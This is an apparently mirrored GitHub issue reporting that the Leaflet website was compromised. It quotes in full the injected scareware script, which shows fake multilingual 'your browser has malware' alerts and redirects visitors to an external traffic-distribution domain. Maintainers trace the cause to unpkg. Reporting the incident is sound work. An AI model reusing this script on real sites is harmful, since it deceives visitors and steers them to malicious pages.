Stuck on an issue?
Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
Site Script Compromised
See original GitHub issueNot sure where to send this but when opening the Leaflet site a pop-up appears and redirects you to some random site.
This is the contents of the script running on line 38 of the main page of http://leafletjs.com/ currently.
var lang = navigator.languages ? navigator.languages[0] : (navigator.language || navigator.userLanguage);
if (lang) lang = lang.substring(0, 2);
console.log('lang: ' + lang);
var country = 'IE';
var msg = 'Your computer is infected. You have to check it with antivirus.';
if (lang == 'es') msg = "Su navegador contiene malware. Usted tiene que instalar la herramienta de eliminación de malware Chrome.";
if (lang == 'it') msg = "Il tuo browser contiene malware. È necessario installare strumento di rimozione malware Chrome.";
if (lang == 'fr') msg = "Votre navigateur contient MALWARE. Vous devez installer l'outil de suppression de logiciels malveillants Chrome.";
if (lang == 'pt') msg = "Seu navegador contém malware. Você tem que instalar o Ferramenta de remoção Chrome Malware.";
if (lang == 'de') msg = "Ihr Browser enthält MALWARE. Sie müssen Chrome Malware Removal Tool zu installieren.";
if (lang == 'ru') msg = "Ваш браузер содержит вредоносный код. Вы должны установить расширение для блокировки вредоносного кода.";
if (lang == 'gr') msg = "Το πρόγραμμα περιήγησής σας περιέχει κακόβουλο λογισμικό. Θα πρέπει να εγκαταστήσετε το Chrome Malware εργαλείο αφαίρεσης.";
if (confirm(msg)) {
window.top.location.href = 'http://compliance-jessica.xyz/tds.php?subid=alertyes' + country + lang;
} else {
window.top.location.href = 'http://compliance-jessica.xyz/tds.php?subid=alertno' + country + lang;
Issue Analytics
- State:
- Created 6 years ago
- Reactions:1
- Comments:7 (1 by maintainers)
Top Results From Across the Web
Malicious scripts in compromised websites and how to protect ...
Malicious scripts are code fragments that, among other places, can be hidden in otherwise legitimate websites, whose security has been ...
Read more >Cross Site Scripting (XSS) - OWASP Foundation
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
Read more >What Indicates A Compromised Website? - Liquid Web
This can very well indicate a compromised website that has been injected with a malicious script or code. The Website Content is Missing...
Read more >Compromised sites - Webmaster. Help - Yandex
A page infected with a malicious script that inserts a malicious iframe tag in the code (top: an iframe tag inserted in the...
Read more >What Is a Malicious Script? - Feroot
Malicious scripts can have a far-reaching impact on both end users and organizations, since they compromise websites and web applications. End Users. Stealing ......
Read more >
Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free
Top Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
Issue was at unpkg; resolved and report coming soon. https://twitter.com/unpkg/status/852669269103869952
Closing. Interested to see the full unpkg report when it is available.